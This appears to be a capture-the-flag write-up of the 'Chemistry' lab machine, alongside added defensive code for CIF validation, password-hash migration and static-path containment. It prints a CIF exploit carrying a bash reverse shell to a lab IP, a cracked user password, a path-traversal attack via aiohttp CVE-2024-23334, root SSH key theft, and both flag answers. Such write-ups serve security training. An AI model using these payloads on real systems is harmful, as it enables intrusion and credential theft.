Chemistry (Easy)

Description

  • Difficulty -> Easy

  • OS -> Linux

  • State -> Retired

  • Tags -> Pending

Write-up

  • I started doing an initial port scan using Nmap

nmap 10.129.92.228 -p- -Pn --min-rate 2500 -oN scan.txt

  • Then I did an exhaustive scan to learn more about the services running on the open ports

nmap 10.129.92.228 -p22,5000 -sVC -oN serv_scan.txt

  • I found the HTTP protocol running on port 5000, in this case a Universal Plug and Play (UPnP) service, which helps with network discovery. To check it, I navigated to the address in the browser, and there I found a simple site that seemed to be a program for processing files related to chemistry. I tried to register and log in, which sent me to a dashboard with an option to upload a Crystallographic Information File (CIF)


  • I didn't know about this type of file, but the site also allowed me to download a sample file to check which parameters the page processed and the file format


  • As the web application let me modify and reupload the file, this could lead to a possible File Upload vulnerability, so I could try to leverage it to gain a Reverse Shell from the server. To do so, I checked the web for possible CVEs and exploits. In this process, I found an interesting repository with a vulnerability that affected versions 2024.2.8 or lower and could help me gain RCE on the target


  • With this, I crafted a modified version of the CIF file to execute commands remotely. In this case, I modified it by adding a payload to gain the Reverse Shell

exploit.cif
data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.14.58/4444 0>&1\'");0,0,0'
_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

I used a custom payload for the reverse shell because some standard payloads didn't work, and the script contained special characters that needed to be interpreted correctly
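As an added example (not part of the original write-up), this is the kind of pre-parse gate an upload handler could apply to CIF files before handing them to the chemistry library: the _space_group_magn.transform_BNS_Pp_abc value is accepted only when it has the plain Jones-faithful form (such as a,b,c;0,0,0), which is what a vulnerable parser would otherwise evaluate as code. The grammar and the list of interpreted keys are my assumptions for the example.

```python
import re
import shlex

# One axis term: optional sign and coefficient, then one of a, b, c (e.g. "a", "-b", "2c", "1/2a")
_TERM = r"[+-]?(?:\d+(?:/\d+)?)?[abc]"
_AXIS = rf"(?:{_TERM})+"
# Translation component: optionally signed integer or fraction (e.g. "0", "1/2", "-1/4")
_FRAC = r"[+-]?\d+(?:/\d+)?"
# Jones-faithful form "x,y,z" with an optional ";t1,t2,t3" translation part
TRANSFORM_RE = re.compile(rf"^{_AXIS},{_AXIS},{_AXIS}(?:;{_FRAC},{_FRAC},{_FRAC})?$")

# CIF data items whose string values vulnerable parsers evaluate instead of storing
# (assumed list for this example; extend it for any other interpreted field)
INTERPRETED_KEYS = {"_space_group_magn.transform_BNS_Pp_abc"}


def transform_is_safe(value: str) -> bool:
    """True only if value is a syntactically plain transform string (no code possible)."""
    return TRANSFORM_RE.fullmatch(value.replace(" ", "")) is not None


def check_cif(text: str) -> list:
    """Return findings for interpreted fields whose value is not a plain transform.

    An empty list means the upload may be passed on. A value missing on the key's own
    line (CIF allows it on the next line) is rejected too: conservative for a gate.
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key, rest = parts[0], (parts[1] if len(parts) > 1 else "")
        if key not in INTERPRETED_KEYS:
            continue
        try:
            tokens = shlex.split(rest)  # CIF quotes values with ' or "; shlex strips both
        except ValueError:
            findings.append(f"line {lineno}: {key} has unbalanced quoting")
            continue
        value = tokens[0] if tokens else ""
        if not transform_is_safe(value):
            findings.append(f"line {lineno}: {key} value is not a plain transform: {value[:40]!r}")
    return findings
```

The same check belongs in detection too: a CIF whose transform field contains anything beyond letters a, b, c, digits, signs, slashes, commas and a semicolon is not a crystallographic file and can be alerted on at upload time.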


  • After that, I uploaded the file to the system and set up a Netcat listener on my machine to receive the connection. Then I clicked the View button to trigger the internal script; the page kept loading, and I checked that the listener had caught the shell from the host. I also sanitized the terminal to work more comfortably and checked which user I was: I now had access as the app user, the one running the web server

nc -nvlp 4444

  • Then I navigated through the system looking for a possible way to do lateral movement or privilege escalation. I found that in the /home folder there was a folder for another user named rosa. I listed the files under this directory and found a user.txt file, but when I tried to read its content I didn't have the proper permissions


  • In these circumstances, I needed to do lateral movement to gain access as rosa. Searching for any clue about how to do it, I found that under the /home/app/instance folder (which contained files of the web service) there was a database.db file, and checking its type with the file command, I confirmed it was a SQLite3 database


  • Knowing this, I interacted with it and retrieved some information. I queried the tables and found a user table, and reading its contents I found some users and values that could be password hashes. I noticed there was also a user rosa in this database, so I could assume it was the system user and try to crack the hash to obtain the password

sqlite3 database.db
sqlite> .tables
sqlite> SELECT * FROM user;

  • To do that, I used the online tool CrackStation to identify and break the hash, and I was lucky because it was a known MD5 hash that revealed the password unicorniosrosados
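The root cause on the application side is an unsalted MD5 password store in the SQLite user table. As an added example (not code from the write-up or from the target application), this audits such a table for bare 32-hex digests and shows the migration path: keep accepting the legacy hash once, then transparently re-hash with salted PBKDF2-HMAC-SHA256 on the next successful login. The column names and sample rows are constructed for the example.

```python
import hashlib
import hmac
import os
import re
import sqlite3

MD5_RE = re.compile(r"^[0-9a-f]{32}$")  # bare 32-hex digest: unsalted MD5 (or similar)
ITERATIONS = 600_000                     # PBKDF2-HMAC-SHA256 work factor (OWASP 2023 guidance)


def audit_user_table(conn: sqlite3.Connection) -> list:
    """Return usernames whose stored password looks like an unsalted MD5 digest."""
    rows = conn.execute("SELECT username, password FROM user").fetchall()
    return [username for username, stored in rows if MD5_RE.fullmatch(stored)]


def pbkdf2_hash(password: str, salt: bytes = b"") -> str:
    """Salted, slow hash in a self-describing 'algo$iters$salt$digest' format."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify(password: str, stored: str) -> bool:
    """Accept both the legacy MD5 format (so existing users can still log in) and the new one."""
    if MD5_RE.fullmatch(stored):
        return hmac.compare_digest(hashlib.md5(password.encode()).hexdigest(), stored)
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def upgrade_on_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Authenticate; on success against a legacy hash, transparently re-hash with PBKDF2."""
    row = conn.execute("SELECT password FROM user WHERE username = ?", (username,)).fetchone()
    if row is None or not verify(password, row[0]):
        return False
    if MD5_RE.fullmatch(row[0]):
        conn.execute("UPDATE user SET password = ? WHERE username = ?",
                     (pbkdf2_hash(password), username))
        conn.commit()
    return True


def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory table: one legacy MD5 user, one already migrated."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO user (username, password) VALUES (?, ?)", [
        ("legacy_user", hashlib.md5(b"constructed-pass-1").hexdigest()),
        ("migrated_user", pbkdf2_hash("constructed-pass-2")),
    ])
    conn.commit()
    return conn
```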


  • Then, I tried to connect through SSH as the rosa user using this password and got in successfully. I also sanitized the terminal again to interact better with it


  • With that, I had the proper permissions to read the user.txt file in the /home/rosa folder and retrieved the user flag

cat user.txt

  • With that, I got the user flag

Answer: 4322e11a0bd69f9f5c49e46ce07b3f35


  • Then, I had to find a way to escalate privileges. I started searching, but after a while I hadn't found anything, so to facilitate the process I tried using LinPEAS to help me find possible escalation paths. After transferring and running it, I found in the results that there was a service running locally on port 8080, which is normally used by some web servers


  • As it was deployed locally, I couldn't access the service directly through a browser, but since I had access to the system via SSH, I could create a tunnel via local port forwarding to access it from my machine. I set up the tunnel and, to confirm it had worked, I accessed the service in the browser and observed the web service deployed correctly

ssh -L 7777:127.0.0.1:8080 rosa@10.129.92.228

  • I explored the site, which seemed to be a statistics service, but after a while I didn't find anything interesting, so I tried to retrieve information about its components. I used the curl command to send a request and retrieve some information from the response headers

curl http://localhost:7777 --head

  • I found the HTTP server was using the aiohttp Python library to serve the web content, along with its version. With this, I searched for possible related CVEs, and after some research I found a GitHub repository with a PoC for CVE-2024-23334, which exploited a Local File Inclusion vulnerability on versions 3.9.1 or lower of aiohttp to read files as the root user


  • I downloaded the exploit and used it to automate the attack, but I needed to find a static route for the attack to work. With a little research, I found some standard folder names for static files. I tried some of them in the exploit and noticed that it worked with the /assets route
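CVE-2024-23334 affected aiohttp static routes configured with follow_symlinks=True, which skipped the check that the resolved file still lies under the static directory; the remedy is upgrading to 3.9.2 or later and leaving follow_symlinks at its default of False. As an added example (not aiohttp's code and not from the write-up), this is the containment check itself in stdlib Python, exercised against a constructed static tree that includes a symlink pointing outside the root.

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote


class Forbidden(Exception):
    """Request resolved to a file outside the static root."""


def resolve_static(root: Path, request_path: str, prefix: str = "/assets") -> Path:
    """Map a URL under `prefix` to a file inside `root`; raise Forbidden if it escapes."""
    if not request_path.startswith(prefix + "/"):
        raise Forbidden("not under the static prefix")
    # Decode percent-encoding once (so %2e%2e becomes '..'), then let the OS
    # normalise '..' segments and follow any symlinks on BOTH sides of the check.
    rel = unquote(request_path[len(prefix) + 1:])
    root_real = root.resolve(strict=True)
    candidate = (root_real / rel).resolve()  # an absolute `rel` replaces root_real entirely
    if not candidate.is_relative_to(root_real):
        raise Forbidden(f"{request_path} escapes {root_real}")
    if not candidate.is_file():
        raise FileNotFoundError(rel)
    return candidate


def build_sample_root() -> Path:
    """Constructed static tree: one real asset plus a symlink that points outside the
    root, which is exactly what a handler with follow_symlinks=True would serve."""
    base = Path(tempfile.mkdtemp())
    root = base / "assets"
    root.mkdir()
    (root / "app.css").write_text("body { margin: 0 }")
    outside = base / "secret.txt"
    outside.write_text("not meant to be reachable via /assets")
    os.symlink(outside, root / "leak.txt")
    return root
```

Because both sides are resolved before the comparison, dot-dot segments, percent-encoded traversal and symlinks inside the root are all caught by the same test, and the response is the same 403 for each rather than a hint about which file exists.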


  • Finally, as I was reading files as the root user, I tried accessing the /root folder and reading the content of root.txt, if it existed, and with that I luckily retrieved the root flag


  • With that, I got the root flag and pwned the machine

Answer: 861d48a12f6494bc174cca5585a3a3e1

Alternative Privilege Escalation

  • I could also escalate privileges by retrieving the SSH keys of the root user. I checked for them in the standard .ssh folder using the default name id_rsa, and fortunately the file existed and leaked the private key


  • With this, I copied the key into a local file and used it to access the target via SSH. With that done, I could go to the /root folder and read the root.txt file to retrieve the root flag

ssh root@10.129.92.228 -i id_rsa
